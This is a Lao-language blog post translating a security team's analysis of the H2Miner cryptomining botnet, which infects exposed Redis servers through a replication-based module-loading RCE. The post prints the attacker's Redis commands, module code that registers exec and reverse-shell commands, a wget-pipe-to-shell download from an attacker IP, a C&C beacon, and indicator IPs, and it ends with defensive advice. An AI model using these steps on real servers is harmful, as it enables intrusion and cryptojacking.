เบเบฒเบ™เบฅเบฐเบšเบฒเบ”เปƒเบซเบกเปˆเบ‚เบญเบ‡เปเบกเปˆเบ—เป‰เบญเบ‡ H2Miner เป„เบ”เป‰เบ–เบทเบเบ„เบปเป‰เบ™เบžเบปเบšเบ—เบตเปˆเบ‚เบธเบ”เบ„เบปเป‰เบ™ Redis RCE

เบกเบทเป‰เบเปˆเบญเบ™เบซเบ™เป‰เบฒเบ™เบตเป‰, เบซเบ™เบถเปˆเบ‡เปƒเบ™เป€เบ„เบทเปˆเบญเบ‡เปเบกเปˆเบ‚เปˆเบฒเบเบ‚เบญเบ‡เป‚เบ„เบ‡เบเบฒเบ™เบ‚เบญเบ‡เบ‚เป‰เบญเบเบ–เบทเบเป‚เบˆเบกเบ•เบตเป‚เบ”เบเปเบกเปˆเบ—เป‰เบญเบ‡เบ—เบตเปˆเบ„เป‰เบฒเบเบ„เบทเบเบฑเบ™. เป€เบžเบทเปˆเบญเบŠเบญเบเบซเบฒเบ„เปเบฒเบ•เบญเบšเบ‚เบญเบ‡เบ„เปเบฒเบ–เบฒเบก "เบญเบฑเบ™เบ™เบฑเป‰เบ™เปเบกเปˆเบ™เบซเบเบฑเบ‡?" เบ‚เป‰เบญเบเบžเบปเบšเบšเบปเบ”เบ„เบงเบฒเบกเบ—เบตเปˆเบ”เบตเป‚เบ”เบเบ—เบตเบกเบ‡เบฒเบ™ Alibaba Cloud Security. เป€เบ™เบทเปˆเบญเบ‡โ€‹เบˆเบฒเบโ€‹เบงเปˆเบฒโ€‹เบ‚เป‰เบฒโ€‹เบžเบฐโ€‹เป€เบˆเบปเป‰เบฒโ€‹เบšเปเปˆโ€‹เป„เบ”เป‰โ€‹เบŠเบญเบโ€‹เบซเบฒโ€‹เบšเบปเบ”โ€‹เบ„เบงเบฒเบกโ€‹เบ™เบตเป‰โ€‹เบเปˆเบฝเบงโ€‹เบเบฑเบš Habre, เบ‚เป‰เบฒโ€‹เบžเบฐโ€‹เป€เบˆเบปเป‰เบฒโ€‹เป„เบ”เป‰โ€‹เบ•เบฑเบ”โ€‹เบชเบดเบ™โ€‹เปƒเบˆโ€‹เบ—เบตเปˆโ€‹เบˆเบฐโ€‹เปเบ›โ€‹เบกเบฑเบ™โ€‹เป‚เบ”เบโ€‹เบชเบฐโ€‹เป€เบžเบฒเบฐโ€‹เปเบกเปˆเบ™โ€‹เบชเปเบฒโ€‹เบฅเบฑเบšโ€‹เบ—เปˆเบฒเบ™ <3

เป€เบ‚เบปเป‰เบฒ

เบšเปเปˆเบ”เบปเบ™เบกเบฒเบ™เบตเป‰, เบ—เบตเบกเบ‡เบฒเบ™เบ„เบงเบฒเบกเบ›เบญเบ”เป„เบžเบ‚เบญเบ‡ Alibaba Cloud เป„เบ”เป‰เบ„เบปเป‰เบ™เบžเบปเบšเบเบฒเบ™เบฅเบฐเบšเบฒเบ”เบ‚เบญเบ‡ H2Miner เบขเปˆเบฒเบ‡เบเบฐเบ—เบฑเบ™เบซเบฑเบ™. เปเบกเปˆเบžเบฐเบเบฒเบ”เบ—เบตเปˆเป€เบ›เบฑเบ™เบญเบฑเบ™เบ•เบฐเบฅเบฒเบเบ™เบตเป‰เปƒเบŠเป‰เบเบฒเบ™เบ‚เบฒเบ”เบเบฒเบ™เบญเบฐเบ™เบธเบเบฒเบ”เบซเบผเบทเบฅเบฐเบซเบฑเบ”เบœเปˆเบฒเบ™เบ—เบตเปˆเบญเปˆเบญเบ™เปเบญเบชเปเบฒเบฅเบฑเบš Redis เป€เบ›เบฑเบ™เบ›เบฐเบ•เบนเบชเบนเปˆเบฅเบฐเบšเบปเบšเบ‚เบญเบ‡เป€เบˆเบปเป‰เบฒ, เบซเบผเบฑเบ‡เบˆเบฒเบเบ™เบฑเป‰เบ™เบกเบฑเบ™ synchronizes เป‚เบกเบ”เบนเบ™เบญเบฑเบ™เบ•เบฐเบฅเบฒเบเบ‚เบญเบ‡เบ•เบปเบ™เป€เบญเบ‡เบเบฑเบš slave เป‚เบ”เบเบœเปˆเบฒเบ™เบเบฒเบ™ synchronization เบ™เบฒเบ-slave เปเบฅเบฐเบชเบธเบ”เบ—เป‰เบฒเบเป„เบ”เป‰เบ”เบฒเบงเป‚เบซเบฅเบ”เป‚เบกเบ”เบนเบ™เบญเบฑเบ™เบ•เบฐเบฅเบฒเบเบ™เบตเป‰เปƒเบชเปˆเป€เบ„เบทเปˆเบญเบ‡เบ—เบตเปˆเบ–เบทเบเป‚เบˆเบกเบ•เบตเปเบฅเบฐเบ›เบฐเบ•เบดเบšเบฑเบ”เบญเบฑเบ™เบ•เบฐเบฅเบฒเบ. เบ„เปเบฒเปเบ™เบฐเบ™เปเบฒ.

เปƒเบ™เบญเบฐเบ”เบตเบ”, เบเบฒเบ™เป‚เบˆเบกเบ•เบตเปƒเบ™เบฅเบฐเบšเบปเบšเบ‚เบญเบ‡เบ—เปˆเบฒเบ™เบชเปˆเบงเบ™เปƒเบซเบเปˆเปเบกเปˆเบ™เบ”เปเบฒเป€เบ™เบตเบ™เป‚เบ”เบเบงเบดเบ—เบตเบเบฒเบ™เบ—เบตเปˆเบเปˆเบฝเบงเบ‚เป‰เบญเบ‡เบเบฑเบšเบงเบฝเบเบ‡เบฒเบ™เบ—เบตเปˆเบเปเบฒเบ™เบปเบ”เป„เบงเป‰เบซเบผเบทเบ›เบธเปˆเบก SSH เบ—เบตเปˆเบ–เบทเบเบ‚เบฝเบ™เป„เบงเป‰เปƒเบ™เป€เบ„เบทเปˆเบญเบ‡เบ‚เบญเบ‡เบ—เปˆเบฒเบ™เบซเบผเบฑเบ‡เบˆเบฒเบเบ—เบตเปˆเบœเบนเป‰เป‚เบˆเบกเบ•เบตเป€เบ‚เบปเป‰เบฒเบชเบนเปˆเบฅเบฐเบšเบปเบš Redis. เป‚เบŠเบเบ”เบต, เบงเบดเบ—เบตเบเบฒเบ™เบ™เบตเป‰เบšเปเปˆเบชเบฒเบกเบฒเบ”เบ–เบทเบเบ™เปเบฒเปƒเบŠเป‰เป€เบฅเบทเป‰เบญเบเป†เป€เบ™เบทเปˆเบญเบ‡เบˆเบฒเบเบกเบตเบšเบฑเบ™เบซเบฒเบเบฑเบšเบเบฒเบ™เบ„เบงเบšเบ„เบธเบกเบเบฒเบ™เบญเบฐเบ™เบธเบเบฒเบ”เบซเบผเบทเป€เบ™เบทเปˆเบญเบ‡เบˆเบฒเบเบชเบฐเบšเบฑเบšเบ‚เบญเบ‡เบฅเบฐเบšเบปเบšเบ—เบตเปˆเปเบ•เบเบ•เปˆเบฒเบ‡เบเบฑเบ™. เบขเปˆเบฒเบ‡เปƒเบ”เบเปเปˆเบ•เบฒเบก, เบงเบดเบ—เบตเบเบฒเบ™เป‚เบซเบผเบ”เป‚เบกเบ”เบนเบ™เบ—เบตเปˆเป€เบ›เบฑเบ™เบญเบฑเบ™เบ•เบฐเบฅเบฒเบเบ™เบตเป‰เบชเบฒเบกเบฒเบ”เบ›เบฐเบ•เบดเบšเบฑเบ”เบ„เปเบฒเบชเบฑเปˆเบ‡เบ‚เบญเบ‡เบœเบนเป‰เป‚เบˆเบกเบ•เบตเป‚เบ”เบเบเบปเบ‡เบซเบผเบทเป€เบ‚เบปเป‰เบฒเป€เบ–เบดเบ‡ shell, เป€เบŠเบดเปˆเบ‡เป€เบ›เบฑเบ™เบญเบฑเบ™เบ•เบฐเบฅเบฒเบเบชเปเบฒเบฅเบฑเบšเบฅเบฐเบšเบปเบšเบ‚เบญเบ‡เบ—เปˆเบฒเบ™.

เป€เบ™เบทเปˆเบญเบ‡เบˆเบฒเบเบˆเปเบฒเบ™เบงเบ™เป€เบ„เบทเปˆเบญเบ‡เปเบกเปˆเบ‚เปˆเบฒเบ Redis เบˆเปเบฒเบ™เบงเบ™เบซเบฅเบฒเบเบ—เบตเปˆเป‚เบฎเบ”เบขเบนเปˆเปƒเบ™เบญเบดเบ™เป€เบ•เบตเป€เบ™เบฑเบ” (เป€เบเบทเบญเบš 1 เบฅเป‰เบฒเบ™), เบ—เบตเบกเบ‡เบฒเบ™เบ„เบงเบฒเบกเบ›เบญเบ”เป„เบžเบ‚เบญเบ‡ Alibaba Cloud, เป€เบ›เบฑเบ™เบ„เปเบฒเป€เบ•เบทเบญเบ™เบ—เบตเปˆเป€เบ›เบฑเบ™เบกเบดเบ”, เปเบ™เบฐเบ™เปเบฒเปƒเบซเป‰เบœเบนเป‰เปƒเบŠเป‰เบšเปเปˆเปเบšเปˆเบ‡เบ›เบฑเบ™ Redis เบญเบญเบ™เป„เบฅเบ™เปŒเปเบฅเบฐเบเบงเบ”เป€เบšเบดเปˆเบ‡เบ„เบงเบฒเบกเป€เบ‚เบฑเป‰เบกเบ‡เบงเบ”เบ‚เบญเบ‡เบฅเบฐเบซเบฑเบ”เบœเปˆเบฒเบ™เบ‚เบญเบ‡เบžเบงเบเป€เบ‚เบปเบฒเบขเปˆเบฒเบ‡เป€เบ›เบฑเบ™เบ›เบปเบเบเบฐเบ•เบดเปเบฅเบฐเบงเปˆเบฒเบžเบงเบเป€เบ‚เบปเบฒเบ–เบทเบเบ—เปเบฒเบฅเบฒเบ. เบเบฒเบ™เบ„เบฑเบ”เป€เบฅเบทเบญเบเป„เบง.

H2 Miner

H2Miner เป€เบ›เบฑเบ™ botnet เบ‚เบธเบ”เบ„เบปเป‰เบ™เบšเปเปˆเปเบฎเปˆเบชเปเบฒเบฅเบฑเบšเบฅเบฐเบšเบปเบš Linux เบ—เบตเปˆเบชเบฒเบกเบฒเบ”เบšเบธเบเบฅเบธเบเบฅเบฐเบšเบปเบšเบ‚เบญเบ‡เบ—เปˆเบฒเบ™เปƒเบ™เบซเบผเบฒเบเป†เบ”เป‰เบฒเบ™, เบฅเบงเบกเบ—เบฑเบ‡เบเบฒเบ™เบ‚เบฒเบ”เบเบฒเบ™เบญเบฐเบ™เบธเบเบฒเบ”เปƒเบ™ Hadoop yarn, Docker, เปเบฅเบฐ Redis remote command execution (RCE) vulnerabilities. botnet เป€เบฎเบฑเบ”เบงเบฝเบเป‚เบ”เบเบเบฒเบ™เบ”เบฒเบงเป‚เบซเบผเบ”เบชเบฐเบ„เบฃเบดเบšเบ—เบตเปˆเป€เบ›เบฑเบ™เบญเบฑเบ™เบ•เบฐเบฅเบฒเบ เปเบฅเบฐ malware เป€เบžเบทเปˆเบญเบ‚เบธเบ”เบ„เบปเป‰เบ™เบ‚เปเป‰เบกเบนเบ™เบ‚เบญเบ‡เบ—เปˆเบฒเบ™, เบ‚เบฐเบซเบเบฒเบเบเบฒเบ™เป‚เบˆเบกเบ•เบตเบ•เบฒเบกเปเบ™เบงเบ™เบญเบ™, เปเบฅเบฐเบฎเบฑเบเบชเบฒเบเบฒเบ™เบชเบทเปˆเบชเบฒเบ™เบ„เปเบฒเบชเบฑเปˆเบ‡ เปเบฅเบฐเบเบฒเบ™เบ„เบงเบšเบ„เบธเบก (C&C).

Redis RCE

เบ„เบงเบฒเบกเบฎเบนเป‰เบเปˆเบฝเบงเบเบฑเบšเป€เบฅเบทเปˆเบญเบ‡เบ™เบตเป‰เป„เบ”เป‰เบ–เบทเบเปเบšเปˆเบ‡เบ›เบฑเบ™เป‚เบ”เบ Pavel Toporkov เบ—เบตเปˆ ZeroNights 2018. เบซเบผเบฑเบ‡เบˆเบฒเบเป€เบงเบตเบŠเบฑเบ™ 4.0, Redis เบชเบฐเบซเบ™เบฑเบšเบชเบฐเบซเบ™เบนเบ™เบ„เบธเบ™เบชเบปเบกเบšเบฑเบ”เบเบฒเบ™เป‚เบซเบผเบ” plug-in เบ—เบตเปˆเปƒเบซเป‰เบœเบนเป‰เปƒเบŠเป‰เบชเบฒเบกเบฒเบ”เป‚เบซเบฅเบ”เป„เบ”เป‰เบ”เบฑเปˆเบ‡เบ™เบฑเป‰เบ™เป„เบŸเบฅเปŒเบ—เบตเปˆเบฅเบงเบšเบฅเบงเบกเบ”เป‰เบงเบ C เป€เบ‚เบปเป‰เบฒเป„เบ›เปƒเบ™ Redis เป€เบžเบทเปˆเบญเบ›เบฐเบ•เบดเบšเบฑเบ”เบ„เปเบฒเบชเบฑเปˆเบ‡เบชเบฐเป€เบžเบฒเบฐ Redis. เบŸเบฑเบ‡เบŠเบฑเบ™เบ™เบตเป‰, เป€เบ–เบดเบ‡เปเบกเปˆเบ™เบงเปˆเบฒเป€เบ›เบฑเบ™เบ›เบฐเป‚เบซเบเบ”, เบกเบตเบŠเปˆเบญเบ‡เป‚เบซเบงเปˆเบ—เบตเปˆ, เปƒเบ™เป‚เบซเบกเบ”เปเบกเปˆเบšเบปเบ”-slave, เป„เบŸเบฅเปŒเบชเบฒเบกเบฒเบ”เบ–เบทเบ synchronized เบเบฑเบš slave เบœเปˆเบฒเบ™เป‚เบซเบกเบ” fullresync. เบ™เบตเป‰เบชเบฒเบกเบฒเบ”เบ–เบทเบเบ™เปเบฒเปƒเบŠเป‰เป‚เบ”เบเบœเบนเป‰เป‚เบˆเบกเบ•เบตเป€เบžเบทเปˆเบญเป‚เบญเบ™เป„เบŸเบฅเปŒเบ—เบตเปˆเป€เบ›เบฑเบ™เบญเบฑเบ™เบ•เบฐเบฅเบฒเบ. เบซเบผเบฑเบ‡เบˆเบฒเบเบเบฒเบ™เป‚เบญเบ™เบเป‰เบฒเบเบชเปเบฒเป€เบฅเบฑเบ”, เบœเบนเป‰เป‚เบˆเบกเบ•เบตเบˆเบฐเป‚เบซเบฅเบ”เป‚เบกเบ”เบนเบ™เปƒเบชเปˆเบ•เบปเบงเบขเปˆเบฒเบ‡ Redis เบ—เบตเปˆเบ–เบทเบเป‚เบˆเบกเบ•เบตเปเบฅเบฐเบ›เบฐเบ•เบดเบšเบฑเบ”เบ„เปเบฒเบชเบฑเปˆเบ‡เปƒเบ”เป†.

เบเบฒเบ™เบงเบดเป€เบ„เบฒเบฐเปเบกเปˆเบ—เป‰เบญเบ‡ Malware

เบšเปเปˆเบ”เบปเบ™เบกเบฒเบ™เบตเป‰, เบ—เบตเบกเบ‡เบฒเบ™เบ„เบงเบฒเบกเบ›เบญเบ”เป„เบžเบ‚เบญเบ‡ Alibaba Cloud เบ„เบปเป‰เบ™เบžเบปเบšเบงเปˆเบฒเบ‚เบฐเบซเบ™เบฒเบ”เบ‚เบญเบ‡เบเบธเปˆเบกเปเบฎเปˆเบ—เบฒเบ”เบ—เบตเปˆเป€เบ›เบฑเบ™เบญเบฑเบ™เบ•เบฐเบฅเบฒเบ H2Miner เป„เบ”เป‰เป€เบžเบตเปˆเบกเบ‚เบถเป‰เบ™เบขเปˆเบฒเบ‡เบเบฐเบ—เบฑเบ™เบซเบฑเบ™. เบญเบตเบ‡เบ•เบฒเบกเบเบฒเบ™เบงเบดเป€เบ„เบฒเบฐ, เบ‚เบฐเบšเบงเบ™เบเบฒเบ™เบ—เบปเปˆเบงเป„เบ›เบ‚เบญเบ‡เบเบฒเบ™เบ›เบฐเบเบปเบ”เบ•เบปเบงเบ‚เบญเบ‡เบเบฒเบ™เป‚เบˆเบกเบ•เบตเปเบกเปˆเบ™เบกเบตเบ”เบฑเปˆเบ‡เบ™เบตเป‰:

เบเบฒเบ™เบฅเบฐเบšเบฒเบ”เปƒเบซเบกเปˆเบ‚เบญเบ‡เปเบกเปˆเบ—เป‰เบญเบ‡ H2Miner เป„เบ”เป‰เบ–เบทเบเบ„เบปเป‰เบ™เบžเบปเบšเบ—เบตเปˆเบ‚เบธเบ”เบ„เบปเป‰เบ™ Redis RCE

H2Miner เปƒเบŠเป‰ RCE Redis เบชเปเบฒเบฅเบฑเบšเบเบฒเบ™เป‚เบˆเบกเบ•เบตเบขเปˆเบฒเบ‡เป€เบ•เบฑเบกเบ—เบตเปˆ. เบœเบนเป‰เป‚เบˆเบกเบ•เบตเบ—เปเบฒเบญเบดเบ”เป‚เบˆเบกเบ•เบตเป€เบ„เบทเปˆเบญเบ‡เปเบกเปˆเบ‚เปˆเบฒเบเบ‚เบญเบ‡ Redis เบ—เบตเปˆเบšเปเปˆเบกเบตเบเบฒเบ™เบ›เป‰เบญเบ‡เบเบฑเบ™เบซเบผเบทเป€เบ„เบทเปˆเบญเบ‡เปเบกเปˆเบ‚เปˆเบฒเบเบ—เบตเปˆเบกเบตเบฅเบฐเบซเบฑเบ”เบœเปˆเบฒเบ™เบ—เบตเปˆเบญเปˆเบญเบ™เปเบญ.

เบซเบผเบฑเบ‡เบˆเบฒเบเบ™เบฑเป‰เบ™, เบžเบงเบเป€เบ‚เบปเบฒเปƒเบŠเป‰เบ„เปเบฒเบชเบฑเปˆเบ‡ config set dbfilename red2.so เป€เบžเบทเปˆเบญเบ›เปˆเบฝเบ™เบŠเบทเปˆเป„เบŸเบฅเปŒ. เบซเบผเบฑเบ‡เบˆเบฒเบเบ™เบตเป‰, เบœเบนเป‰เป‚เบˆเบกเบ•เบตเบ›เบฐเบ•เบดเบšเบฑเบ”เบ„เปเบฒเบชเบฑเปˆเบ‡ slaveof เป€เบžเบทเปˆเบญเบเปเบฒเบ™เบปเบ”เบ—เบตเปˆเบขเบนเปˆ host replication master-slave.

เป€เบกเบทเปˆเบญเบ•เบปเบงเบขเปˆเบฒเบ‡ Redis เบ—เบตเปˆเบ–เบทเบเป‚เบˆเบกเบ•เบตเบชเป‰เบฒเบ‡เบเบฒเบ™เป€เบŠเบทเปˆเบญเบกเบ•เปเปˆเปเบกเปˆเบšเบปเบ” - slave เบเบฑเบš Redis เบญเบฑเบ™เบ•เบฐเบฅเบฒเบเบ—เบตเปˆเป€เบ›เบฑเบ™เป€เบˆเบปเป‰เบฒเบ‚เบญเบ‡เป‚เบ”เบเบœเบนเป‰เป‚เบˆเบกเบ•เบต, เบœเบนเป‰เป‚เบˆเบกเบ•เบตเบชเบปเปˆเบ‡เป‚เบกเบ”เบนเบ™เบ—เบตเปˆเบ•เบดเบ”เป€เบŠเบทเป‰เบญเป‚เบ”เบเปƒเบŠเป‰เบ„เปเบฒเบชเบฑเปˆเบ‡ fullresync เป€เบžเบทเปˆเบญ synchronize เป„เบŸเบฅเปŒ. เบซเบผเบฑเบ‡เบˆเบฒเบเบ™เบฑเป‰เบ™, เป„เบŸเบฅเปŒ red2.so เบˆเบฐเบ–เบทเบเบ”เบฒเบงเป‚เบซเบผเบ”เปƒเบชเปˆเป€เบ„เบทเปˆเบญเบ‡เบ—เบตเปˆเบ–เบทเบเป‚เบˆเบกเบ•เบต. เบซเบผเบฑเบ‡เบˆเบฒเบเบ™เบฑเป‰เบ™, เบœเบนเป‰เป‚เบˆเบกเบ•เบตเปƒเบŠเป‰เป‚เบกเบ”เบนเบ™เบเบฒเบ™เป‚เบซเบผเบ” ./red2.so เป€เบžเบทเปˆเบญเป‚เบซเบฅเบ”เป„เบŸเบฅเปŒเบ™เบตเป‰. เป‚เบกเบ”เบนเบ™เบชเบฒเบกเบฒเบ”เบ›เบฐเบ•เบดเบšเบฑเบ”เบ„เปเบฒเบชเบฑเปˆเบ‡เบˆเบฒเบเบœเบนเป‰เป‚เบˆเบกเบ•เบตเบซเบผเบทเบฅเบดเป€เบฅเบตเปˆเบกเบเบฒเบ™เป€เบŠเบทเปˆเบญเบกเบ•เปเปˆเบ—เบฒเบ‡เบเบฑเบš (backdoor) เป€เบžเบทเปˆเบญเป€เบ‚เบปเป‰เบฒเป€เบ–เบดเบ‡เป€เบ„เบทเปˆเบญเบ‡เบˆเบฑเบเบ—เบตเปˆเบ–เบทเบเป‚เบˆเบกเบ•เบต.

if (RedisModule_CreateCommand(ctx, "system.exec",
        DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;
      if (RedisModule_CreateCommand(ctx, "system.rev",
        RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;

เบซเบผเบฑเบ‡เบˆเบฒเบเบ›เบฐเบ•เบดเบšเบฑเบ”เบ„เปเบฒเบชเบฑเปˆเบ‡เป€เบ›เบฑเบ™เบญเบฑเบ™เบ•เบฐเบฅเบฒเบเป€เบŠเบฑเปˆเบ™: / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, เบœเบนเป‰เป‚เบˆเบกเบ•เบตเบˆเบฐเบฃเบตเป€เบŠเบฑเบ”เบŠเบทเปˆเป„เบŸเบฅเปŒเบชเบณเบฎเบญเบ‡ เปเบฅเบฐเบ–เบญเบ™เบ•เบปเบงเป‚เบกเบ”เบนเบ™เบฅเบฐเบšเบปเบšเป€เบžเบทเปˆเบญเบ—เบณเบ„เบงเบฒเบกเบชเบฐเบญเบฒเบ”เบฎเปˆเบญเบ‡เบฎเบญเบ. เบขเปˆเบฒเบ‡เปƒเบ”เบเปเปˆเบ•เบฒเบก, เป„เบŸเบฅเปŒ red2.so เบˆเบฐเบเบฑเบ‡เบ„เบปเบ‡เบขเบนเปˆเปƒเบ™เป€เบ„เบทเปˆเบญเบ‡เบ—เบตเปˆเบ–เบทเบเป‚เบˆเบกเบ•เบต. เบœเบนเป‰เปƒเบŠเป‰เป„เบ”เป‰เบ–เบทเบเปเบ™เบฐเบ™เปเบฒเปƒเบซเป‰เป€เบญเบปเบฒเปƒเบˆเปƒเบชเปˆเบเบฑเบšเบเบฒเบ™เบ›เบฐเบเบปเบ”เบ•เบปเบงเบ‚เบญเบ‡เป„เบŸเบฅเปŒเบ—เบตเปˆเบซเบ™เป‰เบฒเบชเบปเบ‡เป„เบชเบ”เบฑเปˆเบ‡เบเปˆเบฒเบงเบขเบนเปˆเปƒเบ™เป‚เบŸเบ™เป€เบ”เบตเบ‚เบญเบ‡เบ•เบปเบงเบขเปˆเบฒเบ‡ Redis เบ‚เบญเบ‡เบžเบงเบเป€เบ‚เบปเบฒ.

เบ™เบญเบเป€เบซเบ™เบทเบญเบˆเบฒเบเบเบฒเบ™เบ‚เป‰เบฒเบ‚เบฐเบšเบงเบ™เบเบฒเบ™เบญเบฑเบ™เบ•เบฐเบฅเบฒเบเบšเบฒเบ‡เบขเปˆเบฒเบ‡เป€เบžเบทเปˆเบญเบฅเบฑเบเบŠเบฑเบšเบžเบฐเบเบฒเบเบญเบ™, เบœเบนเป‰เป‚เบˆเบกเบ•เบตเบเบฑเบ‡เบ•เบดเบ”เบ•เบฒเบกเบชเบฐเบ„เบดเบšเบ—เบตเปˆเป€เบ›เบฑเบ™เบญเบฑเบ™เบ•เบฐเบฅเบฒเบเป‚เบ”เบเบเบฒเบ™เบ”เบฒเบงเป‚เบซเบฅเบ”เปเบฅเบฐเบ›เบฐเบ•เบดเบšเบฑเบ”เป„เบŸเบฅเปŒ binary เบ—เบตเปˆเป€เบ›เบฑเบ™เบญเบฑเบ™เบ•เบฐเบฅเบฒเบเป„เบ›เบซเบฒ 142.44.191.122/เบเบฒเบ”เบ•เบดเบžเบตเปˆเบ™เป‰เบญเบ‡. เบ™เบตเป‰เบซเบกเบฒเบเบ„เบงเบฒเบกเบงเปˆเบฒเบŠเบทเปˆเบ‚เบฐเบšเบงเบ™เบเบฒเบ™เบซเบผเบทเบŠเบทเปˆเป„เบ”เป€เบฅเบเบฐเบ—เปเบฅเบตเบ—เบตเปˆเบกเบต kinsing เปƒเบ™เป‚เบฎเบ”เบญเบฒเบ”เบˆเบฐเบŠเบตเป‰เบšเบญเบเบงเปˆเบฒเป€เบ„เบทเปˆเบญเบ‡เบ™เบฑเป‰เบ™เป„เบ”เป‰เบ•เบดเบ”เป€เบŠเบทเป‰เบญเป„เบงเบฃเบฑเบ”เบ™เบตเป‰.

เบญเบตเบ‡เบ•เบฒเบกเบœเบปเบ™เป„เบ”เป‰เบฎเบฑเบšเบ”เป‰เบฒเบ™เบงเบดเบชเบฐเบงเบฐเบเปเบฒเบเป‰เบญเบ™เบเบฑเบš, malware เบชเปˆเบงเบ™เปƒเบซเบเปˆเบ›เบฐเบ•เบดเบšเบฑเบ”เบซเบ™เป‰เบฒเบ—เบตเปˆเบ”เบฑเปˆเบ‡เบ•เปเปˆเป„เบ›เบ™เบตเป‰:

  • เบญเบฑเบšเป‚เบซเบผเบ”เป„เบŸเบฅเปŒ เปเบฅเบฐเบ”เปเบฒเป€เบ™เบตเบ™เบเบฒเบ™เปƒเบซเป‰เป€เบ‚เบปเบฒเป€เบˆเบปเป‰เบฒ
  • เบเบฒเบ™เบ‚เบธเบ”เบ„เบปเป‰เบ™เบšเปเปˆเปเบฎเปˆ
  • เบเบฒเบ™เบฎเบฑเบเบชเบฒเบเบฒเบ™เบชเบทเปˆเบชเบฒเบ™ C&C เปเบฅเบฐเบ›เบฐเบ•เบดเบšเบฑเบ”เบ„เปเบฒเบชเบฑเปˆเบ‡เบ‚เบญเบ‡เบœเบนเป‰เป‚เบˆเบกเบ•เบต

เบเบฒเบ™เบฅเบฐเบšเบฒเบ”เปƒเบซเบกเปˆเบ‚เบญเบ‡เปเบกเปˆเบ—เป‰เบญเบ‡ H2Miner เป„เบ”เป‰เบ–เบทเบเบ„เบปเป‰เบ™เบžเบปเบšเบ—เบตเปˆเบ‚เบธเบ”เบ„เบปเป‰เบ™ Redis RCE

เปƒเบŠเป‰ masscan เบชเปเบฒเบฅเบฑเบšเบเบฒเบ™เบชเบฐเปเบเบ™เบžเบฒเบเบ™เบญเบเป€เบžเบทเปˆเบญเบ‚เบฐเบซเบเบฒเบเบญเบดเบ”เบ—เบดเบžเบปเบ™เบ‚เบญเบ‡เบ—เปˆเบฒเบ™. เบ™เบญเบเบˆเบฒเบเบ™เบฑเป‰เบ™, เบ—เบตเปˆเบขเบนเปˆ IP เบ‚เบญเบ‡เป€เบŠเบตเบšเป€เบงเบต C&C เปเบกเปˆเบ™ hard-coded เปƒเบ™เป‚เบ›เบฅเปเบเบฅเบก, เปเบฅเบฐเป€เบˆเบปเป‰เบฒเบžเบฒเบšเบ—เบตเปˆเบ–เบทเบเป‚เบˆเบกเบ•เบตเบˆเบฐเบ•เบดเบ”เบ•เปเปˆเบชเบทเปˆเบชเบฒเบ™เบเบฑเบšเป€เบ„เบทเปˆเบญเบ‡เปเบกเปˆเบ‚เปˆเบฒเบเบเบฒเบ™เบชเบทเปˆเบชเบฒเบ™ C&C เป‚เบ”เบเปƒเบŠเป‰เบ„เปเบฒเบฎเป‰เบญเบ‡เบ‚เป HTTP, เบšเปˆเบญเบ™เบ—เบตเปˆเบ‚เปเป‰เบกเบนเบ™ zombie (เป€เบ„เบทเปˆเบญเบ‡เปเบกเปˆเบ‚เปˆเบฒเบเบ—เบตเปˆเบ–เบทเบเบ—เปเบฒเบฅเบฒเบ) เบ–เบทเบเบฅเบฐเบšเบธเป„เบงเป‰เปƒเบ™เบชเปˆเบงเบ™เบซเบปเบง HTTP.

เบเบฒเบ™เบฅเบฐเบšเบฒเบ”เปƒเบซเบกเปˆเบ‚เบญเบ‡เปเบกเปˆเบ—เป‰เบญเบ‡ H2Miner เป„เบ”เป‰เบ–เบทเบเบ„เบปเป‰เบ™เบžเบปเบšเบ—เบตเปˆเบ‚เบธเบ”เบ„เบปเป‰เบ™ Redis RCE

GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip

เบงเบดเบ—เบตเบเบฒเบ™เป‚เบˆเบกเบ•เบตเบญเบทเปˆเบ™เป†

เบเบฒเบ™เบฅเบฐเบšเบฒเบ”เปƒเบซเบกเปˆเบ‚เบญเบ‡เปเบกเปˆเบ—เป‰เบญเบ‡ H2Miner เป„เบ”เป‰เบ–เบทเบเบ„เบปเป‰เบ™เบžเบปเบšเบ—เบตเปˆเบ‚เบธเบ”เบ„เบปเป‰เบ™ Redis RCE

เบ—เบตเปˆเบขเบนเปˆ เปเบฅเบฐเบเบฒเบ™เป€เบŠเบทเปˆเบญเบกเบ•เปเปˆเบ—เบตเปˆเปƒเบŠเป‰เป‚เบ”เบเปเบกเปˆเบ—เป‰เบญเบ‡

/เบเบฒเบ”เบ•เบดเบžเบตเปˆเบ™เป‰เบญเบ‡

โ€ข 142.44.191.122/t.sh
โ€ข 185.92.74.42/h.sh
โ€ข 142.44.191.122/spr.sh
โ€ข 142.44.191.122/spre.sh
โ€ข 195.3.146.118/unk.sh

s&c

โ€ข 45.10.88.102
โ€ข 91.215.169.111
โ€ข 139.99.50.255
โ€ข 46.243.253.167
โ€ข 195.123.220.193

เบ„เปเบฒเปเบ™เบฐเบ™เปเบฒ

เบซเบ™เป‰เบฒเบ—เปเบฒเบญเบดเบ”, Redis เบšเปเปˆเบ„เบงเบ™เบชเบฒเบกเบฒเบ”เป€เบ‚เบปเป‰เบฒเป€เบ–เบดเบ‡เป„เบ”เป‰เบˆเบฒเบเบญเบดเบ™เป€เบ•เบตเป€เบ™เบฑเบ”เปเบฅเบฐเบ„เบงเบ™เป„เบ”เป‰เบฎเบฑเบšเบเบฒเบ™เบ›เป‰เบญเบ‡เบเบฑเบ™เบ”เป‰เบงเบเบฅเบฐเบซเบฑเบ”เบœเปˆเบฒเบ™เบ—เบตเปˆเป€เบ‚เบฑเป‰เบกเปเบ‚เบ‡. เบกเบฑเบ™เบเบฑเบ‡เบกเบตเบ„เบงเบฒเบกเบชเปเบฒเบ„เบฑเบ™เบ—เบตเปˆเบฅเบนเบเบ„เป‰เบฒเบเบงเบ”เป€เบšเบดเปˆเบ‡เบงเปˆเบฒเบšเปเปˆเบกเบตเป„เบŸเบฅเปŒ red2.so 